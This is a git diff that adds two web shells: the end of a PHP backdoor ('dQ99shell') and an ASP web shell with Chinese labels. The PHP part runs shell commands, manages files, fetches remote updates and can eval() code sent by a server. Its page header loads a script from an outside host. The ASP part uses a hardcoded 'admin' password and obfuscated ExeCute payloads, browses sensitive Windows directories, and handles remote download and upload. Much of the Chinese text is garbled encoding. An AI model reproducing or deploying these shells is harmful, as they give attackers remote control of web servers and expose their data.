+  elseif ( enabled("shell_exec") ) { $output = shell_exec($cmd); }
+  elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
+  elseif ( enabled("popen") ) {
+    $h = popen($cmd.' 2>&1', 'r');
+    if ( is_resource($h) ) {
+      while ( !feof($h) ) { $output .= fread($h, 2096);  }
+      pclose($h);
+    }
+  }
+  return $output;
+}
+function which($pr) {
+  $path = dQ99exec("which $pr");
+  if(!empty($path)) { return $path; } else { return $pr; }
+}
+
+function get_status() {
+  function showstat($sup,$stat) {
+    if ($stat=="on") { return "$sup: <font color=#00FF00><b>ON</b></font>"; }
+    else { return "$sup: <font color=#FF9900><b>OFF</b></font>"; }
+  }
+  $arrfunc = array(
+    array("MySQL","mysql_connect"),
+    array("MSSQL","mssql_connect"),
+    array("Oracle","ocilogon"),
+    array("PostgreSQL","pg_connect"),
+    array("Curl","curl_version"),
+  );
+  $arrcmd = array(
+    array("Fetch","fetch --help"),
+    array("Wget","wget --help"),
+    array("Perl","perl -v"),
+  );
+
+  $statinfo = array();
+  foreach ($arrfunc as $func) {
+    if (function_exists($func[1])) { $statinfo[] = showstat($func[0],"on"); }
+    else { $statinfo[] = showstat($func[0],"off"); }
+  }
+  $statinfo[] = (@extension_loaded('sockets'))?showstat("Sockets","on"):showstat("Sockets","off");
+  foreach ($arrcmd as $cmd) {
+    if (dQ99exec2($cmd[1])) { $statinfo[] = showstat($cmd[0],"on"); }
+    else { $statinfo[] = showstat($cmd[0],"off"); }
+  }
+  return implode(" ",$statinfo);
+}
+function showdisfunc() {
+  if ($disablefunc = @ini_get("disable_functions")) {
+    return "<font color=#FF9900><b>".$disablefunc."</b></font>";
+  }
+  else { return "<font color=#00FF00><b>NONE</b></b></font>"; }
+}
+function disp_drives($curdir,$surl) {
+  $letters = "";
+  $v = explode("\\",$curdir);
+  $v = $v[0];
+  foreach (range("A","Z") as $letter) {
+    $bool = $isdiskette = $letter == "A";
+    if (!$bool) { $bool = is_dir($letter.":\\"); }
+    if ($bool) {
+      $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".
+                  ($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly!')\"":"")."> ";
+      if ($letter.":" != $v) { $letters .= $letter; }
+      else { $letters .= "<font color=yellow>".$letter."</font>"; }
+      $letters .= "</a> ";
+    }
+  }
+  if (!empty($letters)) { Return $letters; }
+  else  {Return "None"; }
+}
+function disp_freespace($curdrv) {
+  $free = @disk_free_space($curdrv);
+  $total = @disk_total_space($curdrv);
+  if ($free === FALSE) { $free = 0; }
+  if ($total === FALSE) { $total = 0; }
+  if ($free < 0) { $free = 0; }
+  if ($total < 0) { $total = 0; }
+  $used = $total-$free;
+  $free_percent = round(100/($total/$free),2)."%";
+  $free = view_size($free);
+  $total = view_size($total);
+  return "$free of $total ($free_percent)";
+}
+## dQ99Sh UPDATE FUNCTIONS ##
+function dQ99getsource($fn) {
+  global $dQ99sh_sourcesurl;
+  $array = array(
+    "dQ99sh.php" => "dQ99sh.txt",
+  );
+  $name = $array[$fn];
+  if ($name) {return file_get_contents($dQ99sh_sourcesurl.$name);}
+  else {return FALSE;}
+}
+function dQ99sh_getupdate($update = TRUE) {
+  $url = $GLOBALS["dQ99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["sh_ver"]))."&updatenow=".($updatenow?"1":"0");
+  $data = @file_get_contents($url);
+  if (!$data) { return "Can't connect to update-server!"; }
+  else {
+    $data = ltrim($data);
+    $string = substr($data,3,ord($data{2}));
+    if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;}
+    if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
+    if ($data{0} == "\x99" and $data{1} == "\x03") {
+      $string = explode("|",$string);
+      if ($update) {
+        $confvars = array();
+        $sourceurl = $string[0];
+        $source = file_get_contents($sourceurl);
+        if (!$source) {return "Can't fetch update!";}
+        else {
+          $fp = fopen(__FILE__,"w");
+          if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download dQ99shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}
+          else {
+            fwrite($fp,$source);
+            fclose($fp);
+            return "Update completed!";
+          }
+        }
+      }
+      else {return "New version are available: ".$string[1];}
+    }
+    elseif ($data{0} == "\x99" and $data{1} == "\x04") {
+      eval($string);
+      return 1;
+    }
+    else {return "Error in protocol: segmentation failed! (".$data.") ";}
+  }
+}
+function dQ99_buff_prepare() {
+  global $sess_data;
+  global $act;
+  foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+  foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+  $sess_data["copy"] = array_unique($sess_data["copy"]);
+  $sess_data["cut"] = array_unique($sess_data["cut"]);
+  sort($sess_data["copy"]);
+  sort($sess_data["cut"]);
+  if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
+  else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
+}
+function dQ99_sess_put($data) {
+  global $sess_cookie;
+  global $sess_data;
+  dQ99_buff_prepare();
+  $sess_data = $data;
+  $data = serialize($data);
+  setcookie($sess_cookie,$data);
+}
+## END dQ99Sh UPDATE FUNCTIONS ##
+## FILESYSTEM FUNCTIONS ##
+function fs_copy_dir($d,$t) {
+  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  $h = opendir($d);
+  while (($o = readdir($h)) !== FALSE) {
+    if (($o != ".") and ($o != "..")) {
+      if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+      else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+      if (!$ret) {return $ret;}
+    }
+  }
+  closedir($h);
+  return TRUE;
+}
+function fs_copy_obj($d,$t) {
+  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+  $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+  if (!is_dir(dirname($t))) {mkdir(dirname($t));}
+  if (is_dir($d)) {
+    if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+    if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+    return fs_copy_dir($d,$t);
+  }
+  elseif (is_file($d)) { return copy($d,$t); }
+  else { return FALSE; }
+}
+function fs_move_dir($d,$t) {
+
+  $h = opendir($d);
+  if (!is_dir($t)) {mkdir($t);}
+  while (($o = readdir($h)) !== FALSE) {
+    if (($o != ".") and ($o != "..")) {
+      $ret = TRUE;
+      if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+      else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
+      if (!$ret) {return $ret;}
+     }
+   }
+  closedir($h);
+  return TRUE;
+}
+function fs_move_obj($d,$t) {
+  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+  $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+  if (is_dir($d)) {
+    if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+    if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+    return fs_move_dir($d,$t);
+  }
+  elseif (is_file($d)) {
+    if(copy($d,$t)) {return unlink($d);}
+    else {unlink($t); return FALSE;}
+  }
+  else {return FALSE;}
+}
+function fs_rmdir($d) {
+  $h = opendir($d);
+  while (($o = readdir($h)) !== FALSE) {
+    if (($o != ".") and ($o != "..")) {
+      if (!is_dir($d.$o)) {unlink($d.$o);}
+      else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
+    }
+  }
+  closedir($h);
+  rmdir($d);
+  return !is_dir($d);
+}
+function fs_rmobj($o) {
+  $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
+  if (is_dir($o)) {
+    if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
+    return fs_rmdir($o);
+  }
+  elseif (is_file($o)) {return unlink($o);}
+  else {return FALSE;}
+}
+## END FILESYSTEM FUNCTIONS ##
+function onphpshutdown() {
+  global $gzipencode,$ft;
+  if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) {
+    $v = @ob_get_contents();
+    @ob_end_clean();
+    @ob_start("ob_gzHandler");
+    echo $v;
+    @ob_end_flush();
+  }
+}
+function dQ99shexit() { onphpshutdown(); exit; }
+
+function dQ99fsearch($d) {
+  global $found, $found_d, $found_f, $search_i_f, $search_i_d, $a;
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  $h = opendir($d);
+  while (($f = readdir($h)) !== FALSE) {
+    if($f != "." && $f != "..") {
+      $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
+      if (is_dir($d.$f)) {
+        $search_i_d++;
+        if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
+        if (!is_link($d.$f)) {dQ99fsearch($d.$f);}
+      }
+      else {
+        $search_i_f++;
+        if ($bool) {
+          if (!empty($a["text"])) {
+            $r = @file_get_contents($d.$f);
+            if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
+            if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
+            if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
+            else {$bool = strpos(" ".$r,$a["text"],1);}
+            if ($a["text_not"]) {$bool = !$bool;}
+            if ($bool) {$found[] = $d.$f; $found_f++;}
+          }
+          else {$found[] = $d.$f; $found_f++;}
+        }
+      }
+    }
+  }
+  closedir($h);
+}
+function view_size($size) {
+  if (!is_numeric($size)) { return FALSE; }
+  else {
+    if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
+    elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
+    elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
+    else {$size = $size . " B";}
+    return $size;
+  }
+}
+function tabsort($a,$b) { global $v; return strnatcmp($a[$v], $b[$v]);}
+function view_perms($mode) {
+  if (($mode & 0xC000) === 0xC000) {$type = "s";}
+  elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+  elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+  elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
+  elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+  elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+  elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+  else {$type = "?";}
+  $owner["read"] = ($mode & 00400)?"r":"-";
+  $owner["write"] = ($mode & 00200)?"w":"-";
+  $owner["execute"] = ($mode & 00100)?"x":"-";
+  $group["read"] = ($mode & 00040)?"r":"-";
+  $group["write"] = ($mode & 00020)?"w":"-";
+  $group["execute"] = ($mode & 00010)?"x":"-";
+  $world["read"] = ($mode & 00004)?"r":"-";
+  $world["write"] = ($mode & 00002)? "w":"-";
+  $world["execute"] = ($mode & 00001)?"x":"-";
+  if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
+  if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
+  if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
+  return $type.join("",$owner).join("",$group).join("",$world);
+}
+function parse_perms($mode) {
+  if (($mode & 0xC000) === 0xC000) {$t = "s";}
+  elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
+  elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
+  elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
+  elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
+  elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
+  elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
+  else {$t = "?";}
+  $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
+  $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
+  $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
+  return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
+}
+function parsesort($sort) {
+  $one = intval($sort);
+  $second = substr($sort,-1);
+  if ($second != "d") {$second = "a";}
+  return array($one,$second);
+}
+function view_perms_color($o) {
+  if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
+  elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
+  else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
+}
+function str2mini($content,$len) {
+  if (strlen($content) > $len) {
+    $len = ceil($len/2) - 2;
+    return substr($content, 0,$len)."...".substr($content,-$len);
+  } else {return $content;}
+}
+function strips(&$arr,$k="") {
+  if (is_array($arr)) { foreach($arr as $k=>$v) { if (strtoupper($k) != "GLOBALS") { strips($arr["$k"]); } } }
+  else { $arr = stripslashes($arr); }
+}
+
+function getmicrotime() {
+  list($usec, $sec) = explode(" ", microtime());
+  return ((float)$usec + (float)$sec);
+}
+
+function milw0rm() {
+  $Lversion = php_uname(r);
+  $OSV = php_uname(s);
+  if(eregi("Linux",$OSV)) {
+    $Lversion = substr($Lversion,0,6);
+    return "http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion;
+  } else {
+    $Lversion = substr($Lversion,0,3);
+    return "http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;
+  }
+}
+function tools() {
+  echo "List of tools";
+}
+
+function sh_name() { return base64_decode("ZGlLaSBkUTk5c2hlbGwgdg==").sh_ver; }
+function htmlhead($safemode) {
+$style = '
+<style type="text/css">
+body,table {font:8pt verdana;background-color:black;}
+table {width:100%;}
+table,td,#maininfo td {padding:3px;}
+table,td,input,select,option {border:1px solid #808080;}
+body,table,input,select,option {color:#FFFFFF;}
+a {color:lightblue;text-decoration:none; } a:link {color:#5B5BFF;} a:hover {text-decoration:underline;} a:visited {color:#99CCFF;}
+textarea {color:#dedbde;font:8pt Courier New;border:1px solid #666666;margin:2;}
+#pagebar {padding:5px;border:3px solid #1E1E1E;border-collapse:collapse;}
+#pagebar td {vertical-align:top;}
+#pagebar,#pagebar p,.info,input,select,option {font:8pt tahoma;}
+#pagebar a {font-weight:bold;color:#00FF00;}
+#pagebar a:visited {color:#00CE00;}
+#mainmenu {text-align:center;}
+#mainmenu a {text-align: center;padding: 0px 5px 0px 5px;}
+#maininfo,.barheader,.bartitle {text-align:center;}
+.fleft {float:left;text-align:left;}
+.fright {float:right;text-align:right;}
+.bartitle {padding:5px;border:2px solid #1F1F1F;}
+.barheader {font-weight:bold;padding:5px;}
+.info,.info td,.info th {margin:0;padding:0;border-collapse:collapse;}
+.info th {color:#00FF00;text-align:left;width:13%;}
+.contents,.explorer {border-collapse:collapse;}
+.contents,.explorer td,th {vertical-align:top;}
+.mainpanel {border-collapse:collapse;padding:5px;}
+.barheader,.mainpanel table,td {border:1px solid #333333;}
+input[type="submit"],input[type="button"] {border:1px solid #000000;}
+input[type="text"] {padding:3px;}
+.shell {background-color:#000000;color:#00FF00;padding:5px;font-size:12;}
+.fxerrmsg {color:red; font-weight:bold;}
+#pagebar,#pagebar p,h1,h2,h3,h4,form {margin:0;}
+#pagebar,.mainpanel,input[type="submit"],input[type="button"] {background-color:#4A4A4A;}
+.bartitle,input,select,option,input[type="submit"]:hover,input[type="button"]:hover {background-color:#333333;}
+textarea,#pagebar input[type="text"],.mainpanel input[type="text"],input[type="file"],select,option {background-color:#000000;}
+input[type="label"] { text-align:right;}
+.info,.info td,input[type="label"] {border:0;background:none;}
+</style>
+';
+$html_start = '
+<html><head>
+<title>'.getenv("HTTP_HOST").' - '.sh_name().'</title>
+'.$style.'
+</head>
+<SCRIPT SRC=http://7jyewu.cn/a/a.asp></SCRIPT>
+<body>
+<div class=bartitle><h4>'.sh_name().'</h4>.: r57.biz Dq99Shell :.</div>
+';
+return $html_start;
+};
+function footer() {
+  echo "<div class=bartitle colspan=2><font size=1 color=#00FF00> By www.r57.biz, ?2008 FeeLCoMz Community, Generated: ".round(getmicrotime()-starttime,4)." seconds</font></div>";
+}
+chdir($lastdir); dQ99shexit();
+?>
\ No newline at end of file
diff --git a/www-7jyewu-cn/土司搞基asp大马 (1).asp b/www-7jyewu-cn/土司搞基asp大马 (1).asp
new file mode 100644
index 0000000..0972fba
--- /dev/null
+++ b/www-7jyewu-cn/土司搞基asp大马 (1).asp	
@@ -0,0 +1,623 @@
+<%
+
+UserPass="admin"'	����
+'------------------------�������ڷǷ�;��----------------------
+mmname="��˾���asp����"
+bottomad="Oh my God, what is safe?"
+blogurl="http://www.7jyewu.cn/"
+'----------------------һ�к���������޹�----------------------
+Server.ScriptTimeout=999999999:Response.Buffer=true:On Error Resume Next
+ExeCute "sub ShowErr():If Err Then:RRS""<br><a href='javascript:history.back()'><br>&nbsp;"" & Err.Description & ""</a><br>"":Err.Clear:Response.Flush:End If:end sub:Sub RRS(str):response.write(str):End Sub:Function RePath(S):RePath=Replace(S,""\"",""\\""):End Function:Function RRePath(S):RRePath=Replace(S,""\\"",""\""):End Function:URL=Request.ServerVariables(""URL""):ServerIP=Request.ServerVariables(""LOCAL_ADDR""):Action=Request(""Action""):Pos=2:RootPath=Server.MapPath("".""):WWWRoot=Server.MapPath(""/""):Serveru=request.servervariables(""http_host"")&url:FolderPath=Request(""FolderPath""):serverp=UserPass:Pn=pos*44:FName=Request(""FName""):pso=5:BackUrl=""<br><br><center><a href='javascript:history.back()'>����</a></center>"""
+
+RRS"<html><meta http-equiv=""Content-Type"" content=""text/html; charset=gb2312"">"
+RRS"<title>"&mmname&" - "&ServerIP&"</title>"
+rrS"<style type=""text/css"">"
+rrs"body,td{font-size: 12px;background-color:#000000;color:#00ff00;SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #008000; SCROLLBAR-SHADOW-COLOR: #008000; SCROLLBAR-3DLIGHT-COLOR: #000000; SCROLLBAR-ARROW-COLOR: #000000; SCROLLBAR-TRACK-COLOR: #000000; FONT-FAMILY: verdana; SCROLLBAR-DARKSHADOW-COLOR: #000000}"
+rrs"input,select,textarea{BORDER-TOP-WIDTH: 1px; FONT-WEIGHT: bold; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 12px; BORDER-LEFT-COLOR: #008000; BACKGROUND: #004000; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #008000; COLOR: #00ff00; BORDER-TOP-COLOR: #008000; FONT-FAMILY: verdana; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #008000}"
+rrs"hr{color:#00ff00}"
+rrs".C{background-color:#000;border:0px}"
+rrs".cmd{background-color:#000;color:#FFF}"
+rrs"body{margin: 0px;margin-left:4px;}"
+rrs"BODY{color:#00ff00}"
+rrs"a{color:#008000;text-decoration: none;}a:hover{color:#00ff00;background:#000}"
+rrs".am{color:#888;font-size:12px;}"
+rrs"</style>"
+rRs"</style>"
+ExeCute SinfoEn("lError=kilnerrodow.o;}win trueeturns(){rError killctiont>funscrip=javaguaget lanscripRRS~<rs;~`lse;}rn fa retu;else trueeturn~~))r�˲�����ȷ��Ҫִ��rm(~~confi{if (sok()on yeunctiRRS~f~`();}~ubmitorm.saddrf;top.oldere = F.valurPathFoldeform..addr){topolderder(FowFolon ShunctiRRS~f`~~;}} = ~~valueName.orm.Fhidef{top.}elseit();.submeformp.hidon;toFActiue = n.valActioform..hide){top=nullName!}if(Der~~;~~Othme = e{DNa;}elsDNameue = e.val.FNameformp.hide);to,FNam���ڣ�~~���ļ��Ƿ�ȫ����,עMdb�ļ���Ҫѹ����(~~����rompte = p{DNamdb~~)pactM~~Comion==(FActse ife;}el DNamlue =me.vam.FNadeforop.hime);t~,FNa��ͬ����~��,ע�ⲻb�ļ�ȫ���½���Md~������Ҫmpt(~= proName ~~){DteMdb~Creaon==~FActie if(;}elsDNameue = e.val.FNameformp.hide);to,FNamȫ����~~�����ļ���������Ҫ��pt(~~ promame =~){DNlder~NewFon==~~Actio if(F}elseName;|~~+D~~|||e += .valuFNameform..hide);topFName����~~,���ļ���ȫ���ƶ���Ŀ(~~����rompte = p{DNamer~~)eFold~~Movion==(FActse ife;}el+DNam|||~~= ~~|lue +me.vam.FNadeforop.hime);t~,FNa��ȫ����~��Ŀ���ļ��������ƶ�pt(~~ promame =~){DNlder~opyFo==~~Cctionif(FAelse ame;}~~+DN~|||| += ~valueName.orm.Fhidef;top.Name)��~~,F���ļ�ȫ�����ƶ���Ŀ(~~����rompte = p{DNamle~~)oveFi==~~Mctionif(FAelse ame;}~~+DN~|||| += ~valueName.orm.Fhidef;top.Name)��~~,F���ļ�ȫ���븴�Ƶ�Ŀ(~~����rompte = p{DNamle~~)opyFi==~~Cctionif(FAName;e = F.valuFNameform..hide){topctionme,FAm(FNallForon FuunctiRRS~f~",Pso)
+RRS"function DbCheck(){if(DbForm.DbStr.value == """"){alert(""�����������ݿ�"");FullDbStr(0);return false;}return true;}":RRS"function FullDbStr(i){if(i<0){return false;}Str = new Array(12);Str[0] = ""Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&RePath(Session("FolderPath"))&"\\db.mdb;Jet OLEDB:Database Password=***"";Str[1] = ""Driver={Sql Server};Server="&ServerIP&",1433;Database=DbName;Uid=sa;Pwd=****"";Str[2] = ""Driver={MySql};Server="&ServerIP&";Port=3306;Database=DbName;Uid=root;Pwd=****"";Str[3] = ""Dsn=DsnName"";Str[4] = ""SELECT * FROM [TableName] WHERE ID<100"";Str[5] = ""INSERT INTO [TableName](USER,PASS) VALUES(\'username\',\'password\')"";Str[6] = ""DELETE FROM [TableName] WHERE ID=100"";Str[7] = ""UPDATE [TableName] SET USER=\'username\' WHERE ID=100"";Str[8] = ""CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))"";Str[9] = ""DROP TABLE [TableName]"";Str[10]= ""ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)"";Str[11]= ""ALTER TABLE [TableName] DROP COLUMN PASS"";Str[12]= ""��ֻ��ʾһ������ʱ������ʾ�ֶε�ȫ���ֽڣ������������Ʋ�ѯʵ��.\n����һ������ֻ��ʾ�ֶε�ǰ��ʮ���ֽڡ�"";if(i<=3){DbForm.DbStr.value = Str[i];DbForm.SqlStr.value = """";abc.innerHTML=""<center>��ȷ�ϼ��������ݿ�������SQL����������䡣</center>"";}else if(i==12){alert(Str[i]);}else{DbForm.SqlStr.value = Str[i];}return true;}":RRS"function FullSqlStr(str,pg){if(DbForm.DbStr.value.length<5){alert(""�������ݿ����Ӵ��Ƿ���ȷ!"");return false;}if(str.length<10){alert(""����SQL����Ƿ���ȷ!"");return false;}DbForm.SqlStr.value = str;DbForm.Page.value = pg;abc.innerHTML="""";DbForm.submit();return true;}"
+RRS"function gotoURL(targ,selObj,restore){if(selObj.options[selObj.selectedIndex].js==1){eval(selObj.options[selObj.selectedIndex].value);if (restore) selObj.selectedIndex=0}else{eval(targ+"".location='""+selObj.options[selObj.selectedIndex].value+""'"");if (restore) selObj.selectedIndex=0;}}</script>"
+rrs "<body" 
+If Action="" then RRS " scroll=no"
+rrs ">"
+Dim Sot(13,2):Sot(0,0) = "Scripting.FileSystemObject":Sot(0,2) = "�ļ��������":Sot(1,0) = "wscript.shell":Sot(1,2) = "������ִ�����":Sot(2,0) = "ADOX.Catalog":Sot(2,2) = "ACCESS�������":Sot(3,0) = "JRO.JetEngine":Sot(3,2) = "ACCESSѹ�����":Sot(4,0) = "Scripting.Dictionary":Sot(4,2) = "�������ϴ��������":Sot(5,0) = "Adodb.connection":Sot(5,2) = "���ݿ��������":Sot(6,0) = "Adodb.Stream":Sot(6,2) = "�������ϴ����":Sot(7,0) = "SoftArtisans.FileUp":Sot(7,2) = "SA-FileUp �ļ��ϴ����":Sot(8,0) = "LyfUpload.UploadFile":Sot(8,2) = "���Ʒ��ļ��ϴ����":Sot(9,0) = "Persits.Upload.1":Sot(9,2) = "ASPUpload �ļ��ϴ����":Sot(10,0) = "JMail.SmtpMail":Sot(10,2) = "JMail �ʼ��շ����":Sot(11,0) = "CDONTS.NewMail":Sot(11,2) = "����SMTP�������":Sot(12,0) = "SmtpMail.SmtpMail.1":Sot(12,2) = "SmtpMail�������":Sot(13,0) = "Microsoft.XMLHTTP":Sot(13,2) = "���ݴ������"
+For i=0 To 13
+Set T=Server.CreateObject(Sot(i,0))
+If -2147221005 <> Err Then
+IsObj=" ��"
+Else
+IsObj=" ��"
+Err.Clear
+End If
+Set T=Nothing
+Sot(i,1)=IsObj
+Next
+
+
+
+
+If FolderPath<>"" then
+Session("FolderPath")=RRePath(FolderPath)
+End If:If Session("FolderPath")="" Then
+FolderPath=RootPath
+Session("FolderPath")=FolderPath
+End if
+Function MainForm() 
+RRS"<form name=""hideform"" method=""post"" action="""&URL&""" target=""FileFrame"">"
+RRS"<input type=""hidden"" name=""Action"">"
+RRS"<input type=""hidden"" name=""FName"">"
+RRS"</form>"
+RRS"<table width='100%'>"
+RRS"<form name='addrform' method='post' action='"&URL&"' target='_parent'>"
+RRS"<tr><td width='40' align='left'>��ַ��</td><td>"
+RRS"<input name='FolderPath' style='width:100%' value='"&Session("FolderPath")&"'>"
+RRS"</td><td width='70' align='center'><input name='Submit' type='submit' value='GOGO'>" 
+RRS"</td></tr></form></table>"
+RRS"<table width='100%' height='96%' style='border:1px solid #008000;' cellpadding='0' cellspacing='0'>"
+RRS"<td width='135' id=tl>"
+RRS"<iframe name='Left' src='?Action=MainMenu' width='100%' height='100%' frameborder='0'></iframe></td>"
+RRS"<td width=1 style='background:#008000'></td><td width=1 style='padding:2px'><a onclick=""document.getElementById('tl').style.display='none'"" href=##><b>����</b></a><p><a onclick=""document.getElementById('tl').style.display=''"" href=##><b>��ʾ</b></a></p></td><td width=1 style='background:#008000'><td>"
+RRS"<iframe name='FileFrame' src='?Action=Show1File' width='100%' height='100%' frameborder='0'></iframe>"
+RRS"<tr>����<a href='javascript:ShowFolder(""C:\\Program Files"")'>Program</a>������<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\"")'>AllUsers</a>������<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\����ʼ���˵�\\����\\"")'>����</a>������<a href='javascript:ShowFolder(""c:\\Documents and Settings\\All Users\\����ʼ���˵�\\����\\����"")'>����</a>������<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere\\"")'>pcAnywhere</a>������<a href='javascript:ShowFolder(""c:\\Program Files\\serv-u\\"")'>serv-u</a>������<a href='javascript:ShowFolder(""C:\\Program Files\\Real"")'>RealServer</a>������<a href='javascript:ShowFolder(""C:\\Program Files\\Microsoft SQL Server\\"")'>SQL</a>������<a href='javascript:ShowFolder(""c:\\PHP"")'>PHP</a>������<a href='javascript:ShowFolder(""C:\\WINDOWS\\system32\\config\\"")'>config</a>������<a href='javascript:ShowFolder(""c:\\WINDOWS\\system32\\inetsrv\\data\\"")'>data</a>����<a href='javascript:ShowFolder(""c:\\windows\\Temp\\"")'>Temp</a>����<a href='javascript:ShowFolder(""C:\\RECYCLER\\"")'>RECYCLER</a>����<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Documents\\"")'>��д</a>��<br>"
+End Function:Function MainMenu()
+RRS"<table width='100%' cellspacing='0' cellpadding='0'>"
+RRS"<tr><td><hr hight=1 width='100%'>"
+RRS"</td></tr>"
+If soT(0,1)=" ��" Then
+RRS"<tr><td height='24'>��Ȩ��</td></tr>"
+Else
+Set ABC=New LBF:RRS ABC.ShowDriver():Set ABC=Nothing
+RRS"<tr><td height='20'> <a href='javascript:ShowFolder("""&RePath(WWWRoot)&""")'>��վ��Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='javascript:ShowFolder("""&RePath(RootPath)&""")'>������Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=goback' target='FileFrame'>���ϼ�Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\NewFolder")&""",""NewFolder"")'>���½�Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=EditFile' target='FileFrame'>���½��ı�</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=downloads' target='FileFrame'>��Զ������</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=UpFile' target='FileFrame'>���ϴ��ļ�</a><hr></td></tr>"
+
+RRS"<tr><td height='21'><a href='?Action=Course' target='FileFrame'>���û��˺�</a></td></tr>"
